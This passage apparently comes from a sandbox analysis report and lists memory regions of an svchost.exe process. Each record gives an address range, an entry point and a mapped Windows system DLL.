mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1181 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1182 start_va = 0x776e0000 end_va = 0x77888fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1183 start_va = 0x778b0000 end_va = 0x778b6fff monitored = 0 entry_point = 0x778b106c region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 1184 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1185 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1186 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1187 start_va = 0xff8c0000 end_va = 0xff8cafff monitored = 0 entry_point = 0xff8c246c region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 1188 start_va = 0x7fef0fe0000 end_va = 0x7fef1232fff monitored = 0 entry_point = 0x7fef0fe236c region_type = mapped_file name = "wuaueng.dll" filename = "\\Windows\\System32\\wuaueng.dll" (normalized: "c:\\windows\\system32\\wuaueng.dll") Region: id = 1189 start_va = 0x7fef14d0000 end_va = 0x7fef14defff monitored = 0 entry_point = 0x7fef14d9a48 region_type = mapped_file name = "mspatcha.dll" filename = "\\Windows\\System32\\mspatcha.dll" (normalized: "c:\\windows\\system32\\mspatcha.dll") Region: id = 1190 start_va = 0x7fef2100000 end_va = 0x7fef2144fff monitored = 0 entry_point = 0x7fef2133644 region_type = mapped_file name = "upnp.dll" filename = "\\Windows\\System32\\upnp.dll" (normalized: "c:\\windows\\system32\\upnp.dll") Region: id = 1191 start_va = 0x7fef2270000 end_va = 0x7fef2281fff monitored = 0 entry_point = 0x7fef22790bc region_type = mapped_file name = "bitsigd.dll" filename = "\\Windows\\System32\\bitsigd.dll" (normalized: "c:\\windows\\system32\\bitsigd.dll") Region: id = 1192 start_va = 0x7fef2350000 end_va = 0x7fef2359fff monitored = 0 entry_point = 0x7fef2353994 region_type = mapped_file name = "bitsperf.dll" filename = "\\Windows\\System32\\bitsperf.dll" (normalized: "c:\\windows\\system32\\bitsperf.dll") Region: id = 1193 start_va = 0x7fef2630000 end_va = 0x7fef28a9fff monitored = 0 entry_point = 0x7fef2662200 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 1194 start_va = 0x7fef3fe0000 end_va = 0x7fef3ffbfff monitored = 0 entry_point = 0x7fef3fe11a0 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 1195 start_va = 0x7fef4000000 end_va = 0x7fef4061fff monitored = 0 entry_point = 0x7fef4001198 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 1196 start_va = 0x7fef4070000 end_va = 0x7fef40a9fff monitored = 0 entry_point = 0x7fef4071010 region_type = mapped_file name = "mprapi.dll" filename = "\\Windows\\System32\\mprapi.dll" (normalized: "c:\\windows\\system32\\mprapi.dll") Region: id = 1197 start_va = 0x7fef4720000 end_va = 0x7fef4790fff monitored = 0 entry_point = 0x7fef475ecc4 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 1198 start_va = 0x7fef49a0000 end_va = 0x7fef49abfff monitored = 0 entry_point = 0x7fef49a602c region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 1199 start_va = 0x7fef4d10000 end_va = 0x7fef4d17fff monitored = 0 entry_point = 0x7fef4d11414 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 1200 start_va = 0x7fef4d20000 end_va = 0x7fef4d90fff monitored = 0 entry_point = 0x7fef4d651d0 region_type = mapped_file name = "wbemess.dll" filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll") Region: id = 1201 start_va = 0x7fef4da0000 end_va = 0x7fef4db1fff monitored = 0 entry_point = 0x7fef4da89d0 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 1202 start_va = 0x7fef4dc0000 end_va = 0x7fef4e74fff monitored = 0 entry_point = 0x7fef4e3cf80 region_type = mapped_file name = "wmiprvsd.dll" filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll") Region: id = 1203 start_va = 0x7fef4e80000 end_va = 0x7fef4e98fff monitored = 0 entry_point = 0x7fef4e81104 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 1204 start_va = 0x7fef4ea0000 end_va = 0x7fef4eeffff monitored = 0 entry_point = 0x7fef4ea1190 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 1205 start_va = 0x7fef4ef0000 end_va = 0x7fef4ef7fff monitored = 0 entry_point = 0x7fef4ef1020 region_type = mapped_file name = "sscore.dll" filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll") Region: id = 1206 start_va = 0x7fef4f00000 end_va = 0x7fef4f59fff monitored = 0 entry_point = 0x7fef4f3dde0 region_type = mapped_file name = "repdrvfs.dll" filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll") Region: id = 1207 start_va = 0x7fef4f60000 end_va = 0x7fef4f80fff monitored = 0 entry_point = 0x7fef4f703b0 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 1208 start_va = 0x7fef4f90000 end_va = 0x7fef4ffafff monitored = 0 entry_point = 0x7fef4fd4344 region_type = mapped_file name = "hnetcfg.dll" filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll") Region: id = 1209 start_va = 0x7fef5000000 end_va = 0x7fef5012fff monitored = 0 entry_point = 0x7fef5001d80 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 1210 start_va = 0x7fef5020000 end_va = 0x7fef5081fff monitored = 0 entry_point = 0x7fef505bd80 region_type = mapped_file name = "esscli.dll" filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll") Region: id = 1211 start_va = 0x7fef5090000 end_va = 0x7fef51bbfff monitored = 0 entry_point = 0x7fef5140ef0 region_type = mapped_file name = "wbemcore.dll" filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll") Region: id = 1212 start_va = 0x7fef51c0000 end_va = 0x7fef51d9fff monitored = 0 entry_point = 0x7fef51d3fbc region_type = mapped_file name = "nci.dll" filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll") Region: id = 1213 start_va = 0x7fef51e0000 end_va = 0x7fef5263fff monitored = 0 entry_point = 0x7fef5231118 region_type = mapped_file name = "netcfgx.dll" filename = "\\Windows\\System32\\netcfgx.dll" (normalized: "c:\\windows\\system32\\netcfgx.dll") Region: id = 1214 start_va = 0x7fef5270000 end_va = 0x7fef5294fff monitored = 0 entry_point = 0x7fef5288c54 region_type = mapped_file name = "browser.dll" filename = "\\Windows\\System32\\browser.dll" (normalized: "c:\\windows\\system32\\browser.dll") Region: id = 1215 start_va = 0x7fef52a0000 end_va = 0x7fef52dcfff monitored = 0 entry_point = 0x7fef52a1070 region_type = mapped_file name = "srvsvc.dll" filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll") Region: id = 1216 start_va = 0x7fef52e0000 end_va = 0x7fef52edfff monitored = 0 entry_point = 0x7fef52e5500 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 1217 start_va = 0x7fef52f0000 end_va = 0x7fef5316fff monitored = 0 entry_point = 0x7fef52f11a0 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 1218 start_va = 0x7fef5320000 end_va = 0x7fef53f2fff monitored = 0 entry_point = 0x7fef5398b00 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 1219 start_va = 0x7fef5440000 end_va = 0x7fef5486fff monitored = 0 entry_point = 0x7fef5441040 region_type = mapped_file name = "wdscore.dll" filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll") Region: id = 1220 start_va = 0x7fef5490000 end_va = 0x7fef54d1fff monitored = 0 entry_point = 0x7fef54917e4 region_type = mapped_file name = "sqmapi.dll" filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll") Region: id = 1221 start_va = 0x7fef54e0000 end_va = 0x7fef54f0fff monitored = 0 entry_point = 0x7fef54e14c0 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 1222 start_va = 0x7fef5500000 end_va = 0x7fef5591fff monitored = 0 entry_point = 0x7fef55751ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 1223 start_va = 0x7fef55a0000 end_va = 0x7fef5616fff monitored = 0 entry_point = 0x7fef55de7f0 region_type = mapped_file name = "wbemcomn2.dll" filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll") Region: id = 1224 start_va = 0x7fef5620000 end_va = 0x7fef5659fff monitored = 0 entry_point = 0x7fef563d020 region_type = mapped_file name = "wmisvc.dll" filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll") Region: id = 1225 start_va = 0x7fef5880000 end_va = 0x7fef5a2ffff monitored = 0 entry_point = 0x7fef5881010 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 1226 start_va = 0x7fef69e0000 end_va = 0x7fef6a53fff monitored = 0 entry_point = 0x7fef69e66f0 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 1227 start_va = 0x7fef7bd0000 end_va = 0x7fef7beafff monitored = 0 entry_point = 0x7fef7bd1198 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 1228 start_va = 0x7fef8080000 end_va = 0x7fef8151fff monitored = 0 entry_point = 0x7fef8111a10 region_type = mapped_file name = "qmgr.dll" filename = "\\Windows\\System32\\qmgr.dll" (normalized: "c:\\windows\\system32\\qmgr.dll") Region: id = 1229 start_va = 0x7fef8260000 end_va = 0x7fef8268fff monitored = 0 entry_point = 0x7fef82611a0 region_type = mapped_file name = "tschannel.dll" filename = "\\Windows\\System32\\TSChannel.dll" (normalized: "c:\\windows\\system32\\tschannel.dll") Region: id = 1230 start_va = 0x7fef85f0000 end_va = 0x7fef8606fff monitored = 0 entry_point = 0x7fef85f9d50 region_type = mapped_file name = "ncprov.dll" filename = "\\Windows\\System32\\wbem\\NCProv.dll" (normalized: "c:\\windows\\system32\\wbem\\ncprov.dll") Region: id = 1231 start_va = 0x7fef8c40000 end_va = 0x7fef8d2dfff monitored = 0 entry_point = 0x7fef8c412a0 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 1232 start_va = 0x7fef9000000 end_va = 0x7fef9041fff monitored = 0 entry_point = 0x7fef9030048 region_type = mapped_file name = "tcpipcfg.dll" filename = "\\Windows\\System32\\tcpipcfg.dll" (normalized: "c:\\windows\\system32\\tcpipcfg.dll") Region: id = 1233 start_va = 0x7fef9050000 end_va = 0x7fef9069fff monitored = 0 entry_point = 0x7fef9061ae4 region_type = mapped_file name = "rascfg.dll" filename = "\\Windows\\System32\\rascfg.dll" (normalized: "c:\\windows\\system32\\rascfg.dll") Region: id = 1234 start_va = 0x7fef9090000 end_va = 0x7fef909efff monitored = 0 entry_point = 0x7fef9096894 region_type = mapped_file name = "ndiscapcfg.dll" filename = "\\Windows\\System32\\ndiscapCfg.dll" (normalized: "c:\\windows\\system32\\ndiscapcfg.dll") Region: id = 1235 start_va = 0x7fefabb0000 end_va = 0x7fefac26fff monitored = 0 entry_point = 0x7fefabbafd0 region_type = mapped_file name = "taskcomp.dll" filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll") Region: id = 1236 start_va = 0x7fefac50000 end_va = 0x7fefac59fff monitored = 0 entry_point = 0x7fefac5260c region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 1237 start_va = 0x7fefac60000 end_va = 0x7fefad71fff monitored = 0 entry_point = 0x7fefac7f354 region_type = mapped_file name = "schedsvc.dll" filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll") Region: id = 1238 start_va = 0x7fefad80000 end_va = 0x7fefad8efff monitored = 0 entry_point = 0x7fefad87e80 region_type = mapped_file name = "wiarpc.dll" filename = "\\Windows\\System32\\wiarpc.dll" (normalized: "c:\\windows\\system32\\wiarpc.dll") Region: id = 1239 start_va = 0x7fefad90000 end_va = 0x7fefad98fff monitored = 0 entry_point = 0x7fefad93668 region_type = mapped_file name = "fvecerts.dll" filename = "\\Windows\\System32\\fvecerts.dll" (normalized: "c:\\windows\\system32\\fvecerts.dll") Region: id = 1240 start_va = 0x7fefada0000 end_va = 0x7fefada8fff monitored = 0 entry_point = 0x7fefada1020 region_type = mapped_file name = "tbs.dll" filename = "\\Windows\\System32\\tbs.dll" (normalized: "c:\\windows\\system32\\tbs.dll") Region: id = 1241 start_va = 0x7fefadb0000 end_va = 0x7fefae05fff monitored = 0 entry_point = 0x7fefadb1040 region_type = mapped_file name = "fveapi.dll" filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll") Region: id = 1242 start_va = 0x7fefae10000 end_va = 0x7fefae6dfff monitored = 0 entry_point = 0x7fefae19024 region_type = mapped_file name = "shsvcs.dll" filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll") Region: id = 1243 start_va = 0x7fefae70000 end_va = 0x7fefae87fff monitored = 0 entry_point = 0x7fefae71bf8 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 1244 start_va = 0x7fefae90000 end_va = 0x7fefaea0fff monitored = 0 entry_point = 0x7fefae916ac region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 1245 start_va = 0x7fefaee0000 end_va = 0x7fefaf32fff monitored = 0 entry_point = 0x7fefaee2b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 1246 start_va = 0x7fefb0f0000 end_va = 0x7fefb103fff monitored = 0 entry_point = 0x7fefb0f3e64 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 1247 start_va = 0x7fefb110000 end_va = 0x7fefb11afff monitored = 0 entry_point = 0x7fefb111198 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1248 start_va = 0x7fefb120000 end_va = 0x7fefb146fff monitored = 0 entry_point = 0x7fefb1298bc region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1249 start_va = 0x7fefb150000 end_va = 0x7fefb1b6fff monitored = 0 entry_point = 0x7fefb166060 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 1250 start_va = 0x7fefb1d0000 end_va = 0x7fefb1dafff monitored = 0 entry_point = 0x7fefb1d4f8c region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 1251 start_va = 0x7fefb1e0000 end_va = 0x7fefb1ebfff monitored = 0 entry_point = 0x7fefb1e15d8 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 1252 start_va = 0x7fefb1f0000 end_va = 0x7fefb1fffff monitored = 0 entry_point = 0x7fefb1f835c region_type = mapped_file name = "themeservice.dll" filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll") Region: id = 1253 start_va = 0x7fefb200000 end_va = 0x7fefb218fff monitored = 0 entry_point = 0x7fefb2011a8 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 1254 start_va = 0x7fefb220000 end_va = 0x7fefb256fff monitored = 0 entry_point = 0x7fefb228424 region_type = mapped_file name = "profsvc.dll" filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll") Region: id = 1255 start_va = 0x7fefb2a0000 end_va = 0x7fefb2b4fff monitored = 0 entry_point = 0x7fefb2a60d8 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 1256 start_va = 0x7fefb2c0000 end_va = 0x7fefb381fff monitored = 0 entry_point = 0x7fefb2c101c region_type = mapped_file name = "gpsvc.dll" filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll") Region: id = 1257 start_va = 0x7fefb6b0000 end_va = 0x7fefb6dcfff monitored = 0 entry_point = 0x7fefb6b1010 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1258 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f0fff monitored = 0 entry_point = 0x7fefb6e9e7c region_type = mapped_file name = "ssdpapi.dll" filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll") Region: id = 1259 start_va = 0x7fefb700000 end_va = 0x7fefb763fff monitored = 0 entry_point = 0x7fefb701254 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 1260 start_va = 0x7fefb770000 end_va = 0x7fefb7e0fff monitored = 0 entry_point = 0x7fefb771010 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 1261 start_va = 0x7fefb830000 end_va = 0x7fefb843fff monitored = 0 entry_point = 0x7fefb8316b4 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 1262 start_va = 0x7fefb850000 end_va = 0x7fefb864fff monitored = 0 entry_point = 0x7fefb851050 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1263 start_va = 0x7fefb870000 end_va = 0x7fefb87bfff monitored = 0 entry_point = 0x7fefb8718a4 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1264 start_va = 0x7fefb880000 end_va = 0x7fefb895fff monitored = 0 entry_point = 0x7fefb8811a0 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 1265 start_va = 0x7fefb910000 end_va = 0x7fefb926fff monitored = 0 entry_point = 0x7fefb911060 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 1266 start_va = 0x7fefb9b0000 end_va = 0x7fefb9c0fff monitored = 0 entry_point = 0x7fefb9b1070 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1267 start_va = 0x7fefbb10000 end_va = 0x7fefbb44fff monitored = 0 entry_point = 0x7fefbb11064 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 1268 start_va = 0x7fefbf80000 end_va = 0x7fefbfd5fff monitored = 0 entry_point = 0x7fefbf8bbc0 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1269 start_va = 0x7fefbfe0000 end_va = 0x7fefc10bfff monitored = 0 entry_point = 0x7fefbfe94bc region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1270 start_va = 0x7fefc110000 end_va = 0x7fefc12cfff monitored = 0 entry_point = 0x7fefc111ef4 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 1271 start_va = 0x7fefc160000 end_va = 0x7fefc353fff monitored = 0 entry_point = 0x7fefc2ec924 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 1272 start_va = 0x7fefc7f0000 end_va = 0x7fefc7fbfff monitored = 0 entry_point = 0x7fefc7f1064 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1273 start_va = 0x7fefc800000 end_va = 0x7fefc8bafff monitored = 0 entry_point = 0x7fefc806de0 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 1274 start_va = 0x7fefc8c0000 end_va = 0x7fefc8c6fff monitored = 0 entry_point = 0x7fefc8c14b0 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 1275 start_va = 0x7fefc9b0000 end_va = 0x7fefc9cafff monitored = 0 entry_point = 0x7fefc9b2068 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 1276 start_va = 0x7fefc9d0000 end_va = 0x7fefc9edfff monitored = 0 entry_point = 0x7fefc9d13b8 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 1277 start_va = 0x7fefc9f0000 end_va = 0x7fefca01fff monitored = 0 entry_point = 0x7fefc9f1060 region_type = mapped_file name = "devrtl.dll" filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll") Region: id = 1278 start_va = 0x7fefca10000 end_va = 0x7fefca2efff monitored = 0 entry_point = 0x7fefca15c68 region_type = mapped_file name = "spinf.dll" filename = "\\Windows\\System32\\SPInf.dll" (normalized: "c:\\windows\\system32\\spinf.dll") Region: id = 1279 start_va = 0x7fefcae0000 end_va = 0x7fefcb18fff monitored = 0 entry_point = 0x7fefcaec0f0 region_type = mapped_file name = "ubpm.dll" filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll") Region: id = 1280 start_va = 0x7fefcb20000 end_va = 0x7fefcb29fff monitored = 0 entry_point = 0x7fefcb23cb8 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 1281 start_va = 0x7fefcb30000 end_va = 0x7fefcb3cfff monitored = 0 entry_point = 0x7fefcb31348 region_type = mapped_file name = "pcwum.dll" filename = "\\Windows\\System32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll") Region: id = 1282 start_va = 0x7fefcc20000 end_va = 0x7fefcc66fff monitored = 0 entry_point = 0x7fefcc21064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1283 start_va = 0x7fefcd10000 end_va = 0x7fefcd3ffff monitored = 0 entry_point = 0x7fefcd1194c region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 1284 start_va = 0x7fefcd40000 end_va = 0x7fefcd9afff monitored = 0 entry_point = 0x7fefcd46940 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1285 start_va = 0x7fefceb0000 end_va = 0x7fefceb6fff monitored = 0 entry_point = 0x7fefceb142c region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 1286 start_va = 0x7fefcec0000 end_va = 0x7fefcf14fff monitored = 0 entry_point = 0x7fefcec1054 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1287 start_va = 0x7fefcf20000 end_va = 0x7fefcf37fff monitored = 0 entry_point = 0x7fefcf23b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1288 start_va = 0x7fefd030000 end_va = 0x7fefd061fff monitored = 0 entry_point = 0x7fefd03144c region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 1289 start_va = 0x7fefd070000 end_va = 0x7fefd077fff monitored = 0 entry_point = 0x7fefd072a6c region_type = mapped_file name = "wmsgapi.dll" filename = "\\Windows\\System32\\wmsgapi.dll" (normalized: "c:\\windows\\system32\\wmsgapi.dll") Region: id = 1290 start_va = 0x7fefd080000 end_va = 0x7fefd089fff monitored = 0 entry_point = 0x7fefd083b40 region_type = mapped_file name = "sysntfy.dll" filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll") Region: id = 1291 start_va = 0x7fefd090000 end_va = 0x7fefd0b1fff monitored = 0 entry_point = 0x7fefd095d30 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1292 start_va = 0x7fefd110000 end_va = 0x7fefd13efff monitored = 0 entry_point = 0x7fefd111064 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 1293 start_va = 0x7fefd150000 end_va = 0x7fefd1bcfff monitored = 0 entry_point = 0x7fefd151010 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: 